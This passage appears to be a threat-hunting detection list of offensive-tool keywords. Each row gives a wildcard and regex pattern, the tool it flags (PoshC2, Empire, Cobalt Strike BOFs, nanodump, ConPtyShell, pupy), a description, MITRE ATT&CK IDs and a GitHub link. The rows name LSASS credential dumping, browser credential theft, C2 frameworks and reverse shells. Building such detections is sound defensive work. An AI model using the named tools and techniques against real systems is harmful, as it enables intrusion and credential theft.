"*create_protected_process_as_user*",".{0,1000}create_protected_process_as_user.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*Create-ADelegReport*",".{0,1000}Create\-ADelegReport.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*create-aws-instance.py*",".{0,1000}create\-aws\-instance\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*CreateC2Dialog.*",".{0,1000}CreateC2Dialog\..{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*CreateC2Server*",".{0,1000}CreateC2Server.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Created directory for PME at *",".{0,1000}Created\sdirectory\sfor\sPME\sat\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*createdaisypayload*",".{0,1000}createdaisypayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*CreateFile(""twin.txt""*",".{0,1000}CreateFile\(\""twin\.txt\"".{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*Create-HotKeyLNK.json*",".{0,1000}Create\-HotKeyLNK\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" 
"*createlinuxpayload*",".{0,1000}createlinuxpayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Create-MultipleSessions.ps1*",".{0,1000}Create\-MultipleSessions\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Create-NamedPipe*",".{0,1000}Create\-NamedPipe.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*createnewpayload*",".{0,1000}createnewpayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*createnewshellcode*",".{0,1000}createnewshellcode.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*createpbindpayload*",".{0,1000}createpbindpayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*CreateProcessAsUser*",".{0,1000}CreateProcessAsUser.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*createproxypayload -*",".{0,1000}createproxypayload\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*createproxypayload*",".{0,1000}createproxypayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*CreatePseudoConsole function found! 
Spawning a fully interactive shell*",".{0,1000}CreatePseudoConsole\sfunction\sfound!\sSpawning\sa\sfully\sinteractive\sshell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*CreatePseudoConsole function not found! Spawning a netcat-like interactive shell*",".{0,1000}CreatePseudoConsole\sfunction\snot\sfound!\sSpawning\sa\snetcat\-like\sinteractive\sshell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*CreateStringPayload(""RULER"")*",".{0,1000}CreateStringPayload\(\""RULER\""\).{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*Create-SuspendedWinLogon*",".{0,1000}Create\-SuspendedWinLogon.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*CreateTokenClient.exe *",".{0,1000}CreateTokenClient\.exe\s.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*CreateTokenDrv_x64.sys*",".{0,1000}CreateTokenDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - 
TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*Create-WinLogonProcess*",".{0,1000}Create\-WinLogonProcess.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Creating a TGT ticket for the user*",".{0,1000}Creating\sa\sTGT\sticket\sfor\sthe\suser.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP 
Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*Creating DigitalOcean OVPN Proxy tab*",".{0,1000}Creating\sDigitalOcean\sOVPN\sProxy\stab.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","N/A","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","10","1","43","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z" "*Creating offline copies of the LSASS process to perform memory dumps on*",".{0,1000}Creating\soffline\scopies\sof\sthe\sLSASS\sprocess\sto\sperform\smemory\sdumps\son.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*credBandit * output*",".{0,1000}credBandit\s.{0,1000}\soutput.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","0","N/A","10","10","228","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" "*credBandit.*",".{0,1000}credBandit\..{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","228","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" "*credBanditx64*",".{0,1000}credBanditx64.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","228","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" "*creddump.py*",".{0,1000}creddump\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Credential Guard bypass might fail if RunAsPPL is enabled*",".{0,1000}Credential\sGuard\sbypass\smight\sfail\sif\sRunAsPPL\sis\senabled.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*CredentialAccess_CredentialDumping_BrowserDataCSharp.py*",".{0,1000}CredentialAccess_CredentialDumping_BrowserDataCSharp\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" 
"*CredentialAccess_CredentialDumping_KiwiOnLocal.py*",".{0,1000}CredentialAccess_CredentialDumping_KiwiOnLocal\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*CredentialAccess_CredentialDumping_SunLogin.py*",".{0,1000}CredentialAccess_CredentialDumping_SunLogin\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*CredentialAccess_CredentialDumping_WindowsHashDump.py*",".{0,1000}CredentialAccess_CredentialDumping_WindowsHashDump\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*CredentialAccess_CredentialDumping_WindowsWDigestEnable.py*",".{0,1000}CredentialAccess_CredentialDumping_WindowsWDigestEnable\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*CredentialAccess_CredentialInFiles_BrowserData.py*",".{0,1000}CredentialAccess_CredentialInFiles_BrowserData\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*CredentialAccess_CredentialInFiles_WindowsSoftware.py*",".{0,1000}CredentialAccess_CredentialInFiles_WindowsSoftware\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - 
